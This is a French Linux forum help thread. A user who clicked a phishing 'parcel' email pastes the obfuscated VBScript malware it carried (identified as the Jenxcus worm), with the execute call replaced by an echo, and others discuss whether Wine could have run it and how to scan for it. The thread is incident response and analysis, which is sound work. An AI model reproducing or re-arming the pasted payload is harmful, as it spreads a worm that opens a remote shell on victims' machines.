[Résolu] script malicieux VBscript

Nuliel · Le 24/03/2020, à 16:06

Bonjour,
Je viens de faire une grosse bêtise, j'ai ouvert un mail pour un colis en pensant que c'était pour mon colis qui devait arriver et en fait c'était un spam. Et j'ai sans faire exprès tenté d'exécuter un fichier vbs dont voici le contenu (aux amateurs de reverse):

dim tcWKOUISRPTCiyzFzuwhUqdhgKJCUQUsKUboqeWJpPeqmAOIkkIokOEOTRUSNdCqUibloruYy
tcWKOUISRPTCiyzFzuwhUqdhgKJCUQUsKUboqeWJpPeqmAOIkkIokOEOTRUSNdCqUibloruYy = "ܖ܏ܲݞݓݔݓ܏ݑݨ܏ݥݎܱܟܠۼ۹ܾݝ܏ݔݡݡݞݡ܏ݡݔݢݤݜݔ܏ݝݔݧݣۼ۹ۼ۹ݙ܏ܬ܏ݐݡݡݐݨܗܑ݆݂ݒݡݘݟݣܝ݂ݗݔݛݛܑܛܑ݂ݒݡݘݟݣݘݝݖܝܵݘݛݔ݂ݨݢݣݔݜܾݑݙݔݒݣܑܛܑ݂ݗݔݛݛܝܰݟݟݛݘݒݐݣݘݞݝܑܛܑܼݘݒݡݞݢݞݕݣܝܑܼܻܷ݇݃݃ܿܘۼ۹ݖ܏ܬ܏ݐݡݡݐݨܗܑܑܷ݄ܺܲܛܑܑܷܻܼܺܛܑܷ݄ܺܲ݋ݥݦܟݡݜܑܛܑ݋݂ݞݕݣݦݐݡݔ݋ܼݘݒݡݞݢݞݕݣ݋݆ݘݝݓݞݦݢ݋ܲݤݡݡݔݝݣ݅ݔݡݢݘݞݝ݋݁ݤݝ݋ܑܛܑܷܻܼܺ݋݂ܾ݆ܴܵ݃ܰ݁݋ܲݛݐݢݢݔݢ݋ܑܛܑܴ݁ܶݎܑ݂݉ܛܑ݋ݓݔݕݐݤݛݣݘݒݞݝ݋ܑܘۼ۹ݨܬ܏ݐݡݡݐݨܗܑݦݘݝݜݖݜݣݢܩܑܛܑݦݘݝܢܡݎݛݞݖݘݒݐݛݓݘݢݚܑܛܑ݆ݘݝܢܡݎܾݟݔݡݐݣݘݝݖ݂ݨݢݣݔݜܑܛܑݦݘݝݜݖݜݣݢܩ݋݋ݛݞݒݐݛݗݞݢݣ݋ݡݞݞݣ݋ݢݔݒݤݡݘݣݨݒݔݝݣݔݡܑܛܑܰݝݣݘ݅ݘݡݤݢܿݡݞݓݤݒݣܑܘۼ۹ۼ۹ݕݤݝݒݣݘݞݝ܏ݖݞܗݜܘۼ۹ݘݕ܏ݜܬܣ܏ݣݗݔݝۼ۹݃ܬܑݦݘݝݜݖݜݣݢܩ݋݋ݛݞݒݐݛݗݞݢݣ݋ݡݞݞݣ݋ݢݔݒݤݡݘݣݨݒݔݝݣݔݡܑۼ۹݂ݔݣ܏ܱܬܶݔݣܾݑݙݔݒݣܗݨܗܢܘܘܝܸݝݢݣݐݝݒݔݢܾݕܗݨܗܣܘܘۼ۹ݕݞݡ܏ݔݐݒݗ܏ݐ܏ݘݝ܏ݑۼ۹ݖݞܬݐܝݓݘݢݟݛݐݨܽݐݜݔۼ۹ݔݧݘݣ܏ݕݞݡۼ۹ݝݔݧݣۼ۹݂ݔݣ܏ܱܬܶݔݣܾݑݙݔݒݣܗݨܗܢܘ܏ܕ܏ܑܡܑܘܝܸݝݢݣݐݝݒݔݢܾݕܗݨܗܣܘܘۼ۹ݕݞݡ܏ݔݐݒݗ܏ݐ܏ݘݝ܏ݑۼ۹ݖݞܬݐܝݓݘݢݟݛݐݨܽݐݜݔ܏ۼ۹ݔݧݘݣ܏ݕݞݡۼ۹ݝݔݧݣۼ۹ݘݕ܏ݖݞܬܑܑ܏ݣݗݔݝ܏ݖݞܬܑܽݞݣܜݕݞݤݝݓܑۼ۹ݔݛݢݔۼ۹݂ݔݣ܏ܱܬܶݔݣܾݑݙݔݒݣܗݨܗܟܘܘܝܸݝݢݣݐݝݒݔݢܾݕܗݨܗݜܘܘۼ۹ݕݞݡ܏ݔݐݒݗ܏ݐ܏ݘݝ܏ݑۼ۹ݘݕ܏ݜ܏ܬ܏ܠ܏ݣݗݔݝۼ۹ݖݞܬݐܝݥݞݛݤݜݔݢݔݡݘݐݛݝݤݜݑݔݡۼ۹ݔݛݢݔݘݕ܏ݜ܏ܬ܏ܡ܏ݣݗݔݝۼ۹ݖݞܬݐܝݒݐݟݣݘݞݝۼ۹ݔݝݓ܏ݘݕۼ۹ݔݧݘݣ܏ݕݞݡۼ۹ݝݔݧݣۼ۹ݔݝݓ܏ݘݕۼ۹ݔݝݓ܏ݕݤݝݒݣݘݞݝ܏ۼ۹ۼ۹ݢݔݣ܏ݦ܏ܬ܏݆݂ݒݡݘݟݣۼ۹ݢݔݣ܏ݢݗ܏ܬ܏ܲݡܗܟܘۼ۹ݢݔݣ܏ݕݢ܏ܬ܏ܲݡܗܠܘۼ۹ۼ۹ܵݤݝݒݣݘݞݝ܏ܲݡܗܽܘۼ۹݂ݔݣ܏ܲݡ܏ܬ܏ܲݡݔݐݣݔܾݑݙݔݒݣܗݙܗܽܘܘۼ۹ܴݝݓ܏ܵݤݝݒݣݘݞݝۼ۹ۼ۹ݕݤݝݒݣݘݞݝ܏ܴݧܗݢܘۼ۹ܴݧ܏ܬ܏ݢݗܝܴݧݟݐݝݓܴݝݥݘݡݞݝݜݔݝݣ݂ݣݡݘݝݖݢܗܑܔܑܕݢܕܑܔܑܘۼ۹ݔݝݓ܏ݕݤݝݒݣݘݞݝۼ۹ۼ۹ݕݤݝݒݣݘݞݝ܏ܿݣܗܲܛܰܘۼ۹ܿݣܬܑܑۼ۹݂ݔݣ܏݇ܬܲݡܗܢܘۼ۹݇ܝܾݟݔݝ܏ܑܑܾ݂ܿ݃ܛܑݗݣݣݟܩܞܞݗݞݤݢݣݡݘݚݞܝݓݨݝݤܝݝݔݣܩܦܦܤܣܞܑܕܲܛݕݐݛݢݔۼ۹݇ܝݢݔݣݡݔݠݤݔݢݣݗݔݐݓݔݡ܏ܑ݄ݢݔݡܜܰݖݔݝݣܩܑܛݝݕۼ۹݇ܝݢݔݝݓ܏ܰۼ۹ܿݣܬ݇ܝݡݔݢݟݞݝݢݔݣݔݧݣۼ۹ݔݝݓ܏ݕݤݝݒݣݘݞݝۼ۹ۼ۹ܵݤݝݒݣݘݞݝ܏ݝݕۼ۹ݝݕܬܑܑۼ۹ݘܬݖݞܗܠܘۼ۹ݢܬ݅ܽ܏ܕ܏ܑݎܑ܏ܕ܏ݘۼ۹ݝݕܬݝݕܕݢܕݒۼ۹ݢܬݔݧܗܑܑܾܼ݄ܴܼܴܲܿ݃݁ܽܰܘۼ۹ݝݕܬݝݕܕݢܕݒۼ۹ݢܬݔݧܗܑܑ݄݂ܴܼܴ݁ܽܰܘۼ۹ݝݕܬݝݕܕݢܕݒۼ۹ݢܬݖݞܗܡܘۼ۹ݝݕܬݝݕܕݢܕݒۼ۹ݢܬݖݞܗܣܘۼ۹ݝݕܬݝݕܕݢܕݒܕݒܕݝݣܕݒܕݤܕݒۼ۹ܴݝݓ܏ܵݤݝݒݣݘݞݝۼ۹ۼ۹݂ݤݑ܏ܽݢۼ۹ݞݝ܏ݔݡݡݞݡ܏ݡݔݢݤݜݔ܏ݝݔݧݣۼ۹ݓݡܬݔݧܗܑܰݟݟܳݐݣݐܑܘ܏ܕ܏ܲ܏ܕ܏ݦݝۼ۹ݕݢܝܲݞݟݨܵݘݛݔ܏ݕݤܛݓݡܛݣݡݤݔۼ۹ݢݗܝݡݤݝ܏ܑݢݒݗݣݐݢݚݢ܏ܞݒݡݔݐݣݔ܏ܞݢݒ܏ݜݘݝݤݣݔ܏ܞݜݞ܏ܠ܏ܞݣݝ܏݂ݚݨݟݔ܏ܞݣݡ܏ܑ܏ܕ܏ܲݗݡ݆ܗܢܣܘ܏ܕ܏ݓݡܛݕݐݛݢݔۼ۹ݢݗܝݡݔݖݦݡݘݣݔ܏ݖܗܟܘ܏ܕ܏ݖܗܢܘ܏ܕ܏ܑ݄݉݃ܺܟܼ݉ܡܑ݂݄ܛ܏ܲݗ܏ܕ܏ݓݡ܏ܕ܏ܲݗܛ܏ݖܗܤܘۼ۹ݕݢܝݒݞݟݨݕݘݛݔ܏ݕݤܛ܏ܲݡܗܡܘܝܽݐݜݔ݂ݟݐݒݔܗܕܷܦܘܝ݂ݔݛݕܝܿݐݣݗ܏ܕܲ܏ܕ܏ݦݝ܏ܛݣݡݤݔۼ۹ݔݝݓ܏݂ݤݑۼ۹ۼ۹ݓݡܬݔݧܗܑܰݟݟܳݐݣݐܑܘ܏ܕ܏ܲ܏ܕ܏ݦݝۼ۹ۼ۹ݢݤݑ܏ݢݟݡۼ۹ݞݝ܏ݔݡݡݞݡ܏ݡݔݢݤݜݔ܏ݝݔݧݣۼ۹ݕݞݡ܏ݔݐݒݗ܏ݓݡ܏ݘݝ܏ݕݢܝݓݡݘݥݔݢۼ۹ݓݟܬݓݡܝݟݐݣݗ܏ܕ܏ݒۼ۹ݘݕ܏ݓݡܝݘݢݡݔݐݓݨ܏ܬ܏ݣݡݤݔ܏ݣݗݔݝۼ۹ݘݕ܏ݓݡܝݓݡݘݥݔݣݨݟݔ܏ܬ܏ܠ܏ݣݗݔݝۼ۹ݕݢܝݒݞݟݨݕݘݛݔ܏ݕݤܛݓݟ܏ܕ܏ݦݝܛݣݡݤݔۼ۹ݘݕ܏ݕݢܝݕݘݛݔݔݧݘݢݣݢܗݓݟ܏ܕ܏ݦݝܘ܏ݣݗݔݝۼ۹ݕݢܝݖݔݣݕݘݛݔܗݓݟ܏ܕ܏ݦݝܘܝݐݣݣݡݘݑݤݣݔݢܬܡܚܣۼ۹ݔݝݓ܏ݘݕۼ۹ݕݞݡ܏ݔݐݒݗ܏ݕݘ܏ݘݝ܏ݕݢܝݖݔݣݕݞݛݓݔݡܗݓݟܘܝݕݘݛݔݢۼ۹ݘݕ܏ݘݝݢݣݡܗݕݘܝݝݐݜݔܛܑܝܑܘ܏ݣݗݔݝۼ۹ݘݕ܏ݛݒݐݢݔܗݢݟݛݘݣܗݕݘܝݝݐݜݔܛܑܝܑܘ܏ܗݤݑݞݤݝݓܗݢݟݛݘݣܗݕݘܝݝݐݜݔܛܑܝܑܘܘܘܘ܏ܫܭܑݛݝݚܑ܏ݣݗݔݝۼ۹ݕݘܝݐݣݣݡݘݑݤݣݔݢܬܡܚܣۼ۹ݘݕ܏ݤݒݐݢݔܗݕݘܝݝݐݜݔܘ܏ܫܭ܏ݤݒݐݢݔܗݦݝܘ܏ݣݗݔݝۼ۹ݦݘݣݗ܏ݢݗܝݒݡݔݐݣݔݢݗݞݡݣݒݤݣܗݓݟ܏܏ܕ܏ݢݟݛݘݣܗݕݘܝݝݐݜݔܛܑܝܑܘܗܟܘ܏ܕ܏ܑܝݛݝݚܑܘ܏ۼ۹ܝݦݘݝݓݞݦݢݣݨݛݔ܏ܬ܏ܦۼ۹ܝݣݐݡݖݔݣݟݐݣݗ܏ܬ܏ܑݒݜݓܝݔݧݔܑۼ۹ܝݐݡݖݤݜݔݝݣݢ܏ܬ܏ܑܞݒ܏ݢݣݐݡݣ܏ܑ܏ܕ܏ݡݔݟݛݐݒݔܗݦݝܛܑ܏ܑܛ܏ݒݗ܏ܕ܏ܑ܏ܑ܏ܕ܏ݒݗܘ܏ܕ܏ܑܕݢݣݐݡݣ܏ܑ܏ܕ܏ݡݔݟݛݐݒݔܗݕݘܝݝݐݜݔܛܑ܏ܑܛ܏ݒݗ܏ܕ܏ܑ܏ܑ܏ܕ܏ݒݗܘ܏ܕܑܕݔݧݘݣܑۼ۹ݕݘݒ܏ܬ܏ݢݗܝݡݔݖݡݔݐݓܗݖܗܣܘ܏ܕ܏ݢݗܝݡݔݖݡݔݐݓܗݖܗܣܘ܏ܕ܏ܑܝܑ܏ܕ܏ݢݟݛݘݣܗݕݘܝݝݐݜݔܛ܏ܑܝܑܘܗݤݑݞݤݝݓܗݢݟݛݘݣܗݕݘܝݝݐݜݔܛ܏ܑܝܑܘܘܘܕ܏ݒܘ܏ܕ܏ݖܗܥܘܘ܏ۼ۹ݘݕ܏ݘݝݢݣݡܗݘݒݞݝݛݞݒݐݣݘݞݝܛܑܛܑܘ܏ܬ܏ܟ܏ݣݗݔݝۼ۹ܝݘݒݞݝݛݞݒݐݣݘݞݝ܏ܬ܏ݕݘܝݟݐݣݗۼ۹ݔݛݢݔ܏ۼ۹ܝݘݒݞݝݛݞݒݐݣݘݞݝ܏ܬ܏ݕݘݒۼ۹܏ݔݝݓ܏ݘݕۼ۹ܝݢݐݥݔܗܘۼ۹ݔݝݓ܏ݦݘݣݗۼ۹ݔݝݓ܏ݘݕۼ۹ݔݝݓ܏ݘݕۼ۹ݔݝݓ܏ݘݕۼ۹ݝݔݧݣۼ۹ݕݞݡ܏ݔݐݒݗ܏ݕݞ܏ݘݝ܏ݕݢܝݖݔݣݕݞݛݓݔݡܗݓݟܘܝݢݤݑݕݞݛݓݔݡݢۼ۹ݕݞܝݐݣݣݡݘݑݤݣݔݢܬܡܚܣۼ۹ݦݘݣݗ܏ݢݗܝݒݡݔݐݣݔݢݗݞݡݣݒݤݣܗݓݟ܏ܕ܏ݕݞܝݝݐݜݔ܏ܕ܏ܑܝݛݝݚܑܘۼ۹ܝݦݘݝݓݞݦݢݣݨݛݔܬܦۼ۹ܝݣݐݡݖݔݣݟݐݣݗܬܑݒݜݓܝݔݧݔܑۼ۹ܝݐݡݖݤݜݔݝݣݢܬܑܞݒ܏ݢݣݐݡݣ܏ܑ܏ܕ܏ݡݔݟݛݐݒݔܗݦݝܛܑ܏ܑܛ܏ݒݗ܏ܕ܏ܑ܏ܑ܏ܕ܏ݒݗܘ܏ܕ܏ܑܕݢݣݐݡݣ܏ݔݧݟݛݞݡݔݡ܏ܑ܏ܕ܏ݡݔݟݛݐݒݔܗݕݞܝݝݐݜݔܛܑ܏ܑܛ܏ݒݗ܏ܕ܏ܑ܏ܑ܏ܕ܏ݒݗܘ܏ܕܑܕݔݧݘݣܑۼ۹ݕݘݒܬݢݗܝݡݔݖݡݔݐݓܗܑܷܻܼܺ݋ݢݞݕݣݦݐݡݔ݋ݒݛݐݢݢݔݢ݋ݕݞݛݓݔݡܑ܏ܕ܏ݖܗܥܘܘۼ۹ݘݕ܏ݘݝݢݣݡܗܝݘݒݞݝݛݞݒݐݣݘݞݝܛܑܛܑܘܬܟ܏ݣݗݔݝۼ۹ܝݘݒݞݝݛݞݒݐݣݘݞݝܬݕݞܝݟݐݣݗۼ۹ݔݛݢݔۼ۹ܝݘݒݞݝݛݞݒݐݣݘݞݝܬݕݘݒۼ۹ݔݝݓ܏ݘݕۼ۹ܝݢݐݥݔܗܘۼ۹ݔݝݓ܏ݦݘݣݗۼ۹ݝݔݧݣۼ۹ݔݝݓ܏ݘݕۼ۹ݔݝݓ܏ݘݕۼ۹ݝݔݧݣۼ۹ݔݡݡܝݒݛݔݐݡۼ۹ݔݝݓ܏ݢݤݑۼ۹ۼ۹ۼ۹ۼ۹ݥݝܬܑ݆ݘݝݓݞݦݢܑۼ۹݄ܬܑܑۼ۹ۼ۹ݒݗ܏ܬ܏ݒݗݡݦܗܢܣܘۼ۹ݒ܏ܬ܏ݒݗݡݦܗܨܡܘۼ۹ݕݤ܏ܬ܏ݦܝݢݒݡݘݟݣݕݤݛݛݝݐݜݔۼ۹ݦݝܬݦܝݢݒݡݘݟݣݝݐݜݔۼ۹ܽ݃ܬܑܽݞܑۼ۹ݘݕ܏ݕݢܝݕݘݛݔݔݧݘݢݣݢܗݔݧܗܑ݆ݘݝݓݘݡܑܘ܏ܕ܏ܑ݋ܼݘݒݡݞݢݞݕݣܝܴܽ݃݋ܵݡݐݜݔݦݞݡݚ݋ݥܡܝܟܝܤܟܦܡܦ݋ݥݑݒܝݔݧݔܑܘ܏ݣݗݔݝۼ۹ܽ݃ܬܑ݈ݔݢܑۼ۹ݔݝݓ܏ݘݕۼ۹ۼ۹݄ܬ܏ݢݗܝݡݔݖݡݔݐݓܗݖܗܡܘܘۼ۹ݘݕ܏݄ܬܑܑ܏ݣݗݔݝۼ۹ݘݕ܏ݜݘݓܗݕݤܛܡܘܬܑܩ݋ܑ܏ܕ܏ݦݝ܏ݣݗݔݝۼ۹݄ܬܑܑ݄ܴ݃݁ۼ۹ݢݗܝݡݔݖݦݡݘݣݔ܏ݖܗܡܘܛ܏݄ܛ܏ݖܗܤܘۼ۹ݔݛݢݔۼ۹݄ܬܑܑܻ݂ܴܵܰۼ۹ݢݗܝݡݔݖݦݡݘݣݔ܏ݖܗܡܘܛ܏݄ܛ܏ݖܗܤܘۼ۹ݔݝݓ܏ݘݕۼ۹ݔݝݓ܏ݘݕۼ۹ۼ۹ܽݢۼ۹ݢݟݛܬܑݫ݅ݫܑۼ۹ݦݗݘݛݔ܏ݣݡݤݔۼ۹ݢܬݢݟݛݘݣܗܿݣܗܑ݅ݡݔܑܛܑܑܘܛݢݟݛܘۼ۹ݢݔݛݔݒݣ܏ݒݐݢݔ܏ݢܗܟܘۼ۹ݒݐݢݔ܏ܑݔݧݒܑۼ۹ݢݐܬ܏ݢܗܠܘۼ۹ݔݧݔݒݤݣݔ܏ݢݐۼ۹ݒݐݢݔ܏ܑ݂ݒܑۼ۹ݢܡ܏ܬ܏ܴݧܗܑݣݔݜݟܑܘ܏ܕ܏ܑ݋ܑ܏ܕ܏ݢܗܡܘۼ۹ݢݔݣ܏ݦݡ܏ܬ܏ݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݢܡܛܡܛ݃ݡݤݔܘۼ۹ݦݡܝ݆ݡݘݣݔ܏ݢܗܠܘۼ۹ݦݡܝܲݛݞݢݔܗܘۼ۹ݢݗܝݡݤݝ܏ݢܡܛ܏ܥۼ۹ݒݐݢݔ܏ܑܑ݁ܵۼ۹ݢܡ܏ܬ܏ܴݧܗܑݣݔݜݟܑܘ܏ܕ܏ܑ݋ܑ܏ܕ܏ݢܗܡܘۼ۹ݢݔݣ܏ݦݡ܏ܬ܏ݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݢܡܛܡܛ݃ݡݤݔܘۼ۹ݦݡܝ݆ݡݘݣݔ܏ݢܗܠܘۼ۹ݦݡܝܲݛݞݢݔܗܘۼ۹ݢݗܝݡݤݝ܏ݢܡۼ۹ݒݐݢݔ܏ܑ݁ݔݝܑۼ۹ݢݔݣ܏ݦݡ܏ܬ܏ݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݕݤܛܠܘۼ۹ݕ܏ܬ܏ݦݡܝ݁ݔݐݓܰݛݛۼ۹ݦݡܝݒݛݞݢݔܗܘۼ۹ݕ܏ܬ܏ݡݔݟݛݐݒݔܗݕܛݒݗܕݥݝܕݒݗܛݒݗܕݢܗܠܘܕݒݗܘۼ۹ݢݔݣ܏ݦݡ܏ܬ܏ݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݕݤܛܡܛݕݐݛݢݔܘۼ۹ݦݡܝ݆ݡݘݣݔ܏ݕۼ۹ݦݡܝݒݛݞݢݔܗܘۼ۹ݒݐݢݔ܏ܑ݄ݟܑۼ۹ݢݔݣ܏ݦݡ܏ܬ܏ݕݢܝܾݟݔݝ݃ݔݧݣܵݘݛݔܗݕݤܛܡܛݕݐݛݢݔܘۼ۹ݢܗܠܘ܏ܬ܏ݡݔݟݛݐݒݔܗݢܗܠܘܛܑݫ݄ݫܑܛܑݫ݅ݫܑܘۼ۹ݦݡܝ݆ݡݘݣݔ܏ݢܗܠܘۼ۹ݦݡܝܲݛݞݢݔܗܘۼ۹ݢݗܝݡݤݝ܏ܑݦݢݒݡݘݟݣܝݔݧݔ܏ܞܞܱ܏ܑ܏ܕ܏ݒݗ܏ܕ܏ݕݤ܏ܕ܏ݒݗܛ܏ܥۼ۹ݦܝݠݤݘݣۼ۹ݒݐݢݔ܏ܑܲݛܑۼ۹݆ܝݠݤݘݣ܏ۼ۹ݒݐݢݔ܏ܑ݄ݝܑۼ۹݂ܗܠܘ܏ܬ܏ݡݔݟݛݐݒݔܗ݂ܗܠܘܛܑܔݕܑܛݕݤܘۼ۹݂ܗܠܘ܏ܬ܏ݡݔݟݛݐݒݔܗ݂ܗܠܘܛܑܔݝܑܛݦݝܘۼ۹݂ܗܠܘ܏ܬ܏ݡݔݟݛݐݒݔܗ݂ܗܠܘܛܑܔݢݕݓݡܑܛݓݡܘۼ۹ݔݧݔݒݤݣݔ܏݂ܗܠܘۼ۹ݦܝݠݤݘݣۼ۹ݔݝݓ܏ݢݔݛݔݒݣۼ۹݆ܝ݂ݛݔݔݟ܏ܥܟܟܟۼ۹݂ݟݡۼ۹ݦݔݝݓ"
QhabtGxPVSmqaodFuleiyhMdMORySQPKnEsCXZoecOhKXInmYYJkZyGiPdBJHiBTHICAOhhOzZhDBVFLYVGxNRf = ""
Dim wVHjbbCiUkelksgSYsGkDSVRUNaCwPyrpLDfoKiLOSqLnUHvJGjedRiyUqBUCsCZpOtcggZk
wVHjbbCiUkelksgSYsGkDSVRUNaCwPyrpLDfoKiLOSqLnUHvJGjedRiyUqBUCsCZpOtcggZk = 0
dim mvJPJeMCCsyxVAxhAqnBiKQdAlgucQMhQwYrMBrrThnhkbwYxQMGnhjAEaeNbNyLmxVJGchyPbsjkTGlVQkowDF
mvJPJeMCCsyxVAxhAqnBiKQdAlgucQMhQwYrMBrrThnhkbwYxQMGnhjAEaeNbNyLmxVJGchyPbsjkTGlVQkowDF = 0
dim CSPCBHxJqYLpeDlsoMVtwtJREUYqwAUQgiZBRnxppFbMsrHCxajcaGGBEaKjPBpbfnRatfqhDmflLNKFLKlVpHl
dim qwsUAtkNvyFxPLCTpPFcyKJalLKiStlbmCGZGEXTqqKbxqDxytkvmrpOgXcsMADtfKuaecbWffDJndqogONubFu
CSPCBHxJqYLpeDlsoMVtwtJREUYqwAUQgiZBRnxppFbMsrHCxajcaGGBEaKjPBpbfnRatfqhDmflLNKFLKlVpHl = "HGFTYtdcyfsaty!@#FFDS"
qwsUAtkNvyFxPLCTpPFcyKJalLKiStlbmCGZGEXTqqKbxqDxytkvmrpOgXcsMADtfKuaecbWffDJndqogONubFu = 0
do until mvJPJeMCCsyxVAxhAqnBiKQdAlgucQMhQwYrMBrrThnhkbwYxQMGnhjAEaeNbNyLmxVJGchyPbsjkTGlVQkowDF = len(CSPCBHxJqYLpeDlsoMVtwtJREUYqwAUQgiZBRnxppFbMsrHCxajcaGGBEaKjPBpbfnRatfqhDmflLNKFLKlVpHl)
mvJPJeMCCsyxVAxhAqnBiKQdAlgucQMhQwYrMBrrThnhkbwYxQMGnhjAEaeNbNyLmxVJGchyPbsjkTGlVQkowDF = mvJPJeMCCsyxVAxhAqnBiKQdAlgucQMhQwYrMBrrThnhkbwYxQMGnhjAEaeNbNyLmxVJGchyPbsjkTGlVQkowDF + 1
qwsUAtkNvyFxPLCTpPFcyKJalLKiStlbmCGZGEXTqqKbxqDxytkvmrpOgXcsMADtfKuaecbWffDJndqogONubFu = qwsUAtkNvyFxPLCTpPFcyKJalLKiStlbmCGZGEXTqqKbxqDxytkvmrpOgXcsMADtfKuaecbWffDJndqogONubFu + AscW(mid(CSPCBHxJqYLpeDlsoMVtwtJREUYqwAUQgiZBRnxppFbMsrHCxajcaGGBEaKjPBpbfnRatfqhDmflLNKFLKlVpHl,mvJPJeMCCsyxVAxhAqnBiKQdAlgucQMhQwYrMBrrThnhkbwYxQMGnhjAEaeNbNyLmxVJGchyPbsjkTGlVQkowDF,1))

loop
do until wVHjbbCiUkelksgSYsGkDSVRUNaCwPyrpLDfoKiLOSqLnUHvJGjedRiyUqBUCsCZpOtcggZk = Len(tcWKOUISRPTCiyzFzuwhUqdhgKJCUQUsKUboqeWJpPeqmAOIkkIokOEOTRUSNdCqUibloruYy)
wVHjbbCiUkelksgSYsGkDSVRUNaCwPyrpLDfoKiLOSqLnUHvJGjedRiyUqBUCsCZpOtcggZk= wVHjbbCiUkelksgSYsGkDSVRUNaCwPyrpLDfoKiLOSqLnUHvJGjedRiyUqBUCsCZpOtcggZk + 1
QhabtGxPVSmqaodFuleiyhMdMORySQPKnEsCXZoecOhKXInmYYJkZyGiPdBJHiBTHICAOhhOzZhDBVFLYVGxNRf = QhabtGxPVSmqaodFuleiyhMdMORySQPKnEsCXZoecOhKXInmYYJkZyGiPdBJHiBTHICAOhhOzZhDBVFLYVGxNRf & ChrW(AscW(Mid(tcWKOUISRPTCiyzFzuwhUqdhgKJCUQUsKUboqeWJpPeqmAOIkkIokOEOTRUSNdCqUibloruYy, wVHjbbCiUkelksgSYsGkDSVRUNaCwPyrpLDfoKiLOSqLnUHvJGjedRiyUqBUCsCZpOtcggZk, 1)) - qwsUAtkNvyFxPLCTpPFcyKJalLKiStlbmCGZGEXTqqKbxqDxytkvmrpOgXcsMADtfKuaecbWffDJndqogONubFu + len(CSPCBHxJqYLpeDlsoMVtwtJREUYqwAUQgiZBRnxppFbMsrHCxajcaGGBEaKjPBpbfnRatfqhDmflLNKFLKlVpHl))
loop
Wscript.Echo QhabtGxPVSmqaodFuleiyhMdMORySQPKnEsCXZoecOhKXInmYYJkZyGiPdBJHiBTHICAOhhOzZhDBVFLYVGxNRf

Ai je fait une grosse bêtise ou une bêtise ou en fait ça n'a rien fait?

PS: c'est sur mon pc fixe donc wine est installé

PS2 (comme la console): j'ai remplacé execute par Wscript.Echo pour des raisons évidentes

Dernière modification par Nuliel (Le 25/03/2020, à 21:57)

Nuliel · Le 24/03/2020, à 17:09

Quelques infos supplémentaires:
- virustotal m'annonce que son petit nom est jenxcus
- il infecte les clés usb (super, j'avais ma clé usb de cours branchée)
- il permet à l'attaquant d'avoir un shell distant

Voilà. Je vais passer clamav sur ma clé usb déjà

Nuliel · Le 24/03/2020, à 17:56

Bon, je viens de tester un truc: essayer de lancer un hello world avec wine.
Résultat: ça marche pas (ou je m'y prends mal)

tuxmarc · Le 24/03/2020, à 18:42

Bonjour Naziel

On en apprend tous les jours.
Je n'avais aucune idée de ce qu'était un fichier VBS, Wikipedia a rempli le vide :

Wikipedia a écrit :

VBScript (diminutif de Microsoft Visual Basic Scripting Edition, créé par Microsoft) est un sous-ensemble de Visual Basic utilisé en tant que langage de script d'usage général. Il est souvent comparé au JScript.
Virus informatiques et VBScript
Permettant de réaliser pratiquement n'importe quelle opération sous un système Windows en utilisant la technologie ActiveX et Killbit, le VBscript a été utilisé pour la création de nombreux virus informatiques.
De nombreux virus écrits en VBscript apparaissent en l'an 2000. L'un des plus connus est le virus « VBS.LoveLetter » aussi connu sous le nom de « I love you ».

A ce que j'ai compris, c'est grâce à une création de M$ que les hackers se sont bien amusés !!

Je suis incapable de dire si le bazar aurait pu se glisser dans les fichiers de Wine et faire des bêtises, mais j'en doute.

A une époque je me suis amusé à cliquer volontairement sur des trucs foireux qui pouvaient semer le souk sur un système W$, et sur mon système, jamais rien eu

En plus de clamav, un coup de rkhunter ça serait rassurant.

Nuliel · Le 24/03/2020, à 18:49

J'ai demandé en même temps sur irc (canal de rootme) et on m'a dit qu'il y a des chances que cela n'ait absolument rien fait.
J'ai trouvé une méthode pour désobfusquer le code précédent (remplacer execute par MsgBox oo WScript), dès que j'arrive à avoir accès à ma clé usb sous virtualbox je teste ça.
J'arrive pas à faire fonctionner clamav, freshclam ne fonctionne pas

Dernière modification par Nuliel (Le 24/03/2020, à 18:50)

tuxmarc · Le 24/03/2020, à 18:54

Naziel a écrit :

J'arrive pas à faire fonctionner clamav, freshclam ne fonctionne pas

Réinstallation complète.
Cela dit, je l'ai d'installé sur des distris, je ne m'en sers guère, je vois qu'il est là quand la bécane n'avance guère et que top cafte qu'il bouffe plein de place.

rogn... · Le 24/03/2020, à 18:55

Quelle était l'extension du fichier ?

Nuliel · Le 24/03/2020, à 18:56

L'extension est vbs

rogn... · Le 24/03/2020, à 19:00

Et pourquoi tu dis "'j'ai sans faire exprès tenté d'exécuter un fichier vbs" ? Tu as une action spécifique lors d'un double-clic sur ce type de fichier ?

Dernière modification par rogn... (Le 24/03/2020, à 19:01)

Nuliel · Le 24/03/2020, à 19:00

Bah parce que j'avais pas vu l'extension et que j'ai cliqué dessus

rogn... · Le 24/03/2020, à 19:07

Tu étais sur Thunderbird ?

Nuliel · Le 24/03/2020, à 19:10

Oui, l'extension était bien visible mais j'ai cliqué trop vite en fait, surtout que ça parlait de colis et que j'attends justement un colis (plus précisément le colis a mis un mois pour arriver et il en manque un morceau, donc la deuxième partie arrive, dans plus d'un mois sûrement...)

Et je viens de tester en machine virtuelle, le script ne se lance même pas avec wine.

Dernière modification par Nuliel (Le 24/03/2020, à 19:13)

Pending... · Le 24/03/2020, à 19:13

Tu as lancé ça depuis une installation Linux ? Si c'est le cas, je ne vois pas en quoi il aurait pu t'infecter, même avec Wine d'installé.

Nuliel · Le 24/03/2020, à 19:15

Oui, depuis ubuntu 18.04.1 à jour.
En fait, je me demandais si wine pouvait exécuter des fichiers vbs et potentiellement faire des bêtises dans mes fichiers, mais visiblement il sait pas faire.

Nuliel · Le 24/03/2020, à 19:33

Bon, je viens de desobfusquer le code du dessus, effectivement ça parle windows de A à Z.

rogn... · Le 24/03/2020, à 20:46

Il ne saura pas faire car il n'y a pas de moteur VB sur ton PC, à moins que tu en aies installé un.

Nuliel · Le 24/03/2020, à 21:40

Je n'ai pas installé volontairement de moteur VB mais peut être que lutris en a installé un pour l'un de mes jeux.
Au final j'ai réussi à lancer le malware modifié avec winetricks, ce qui m'a permis d'obtenir le code source.

Dernière modification par Nuliel (Le 24/03/2020, à 21:41)

Nuliel · Le 25/03/2020, à 21:55

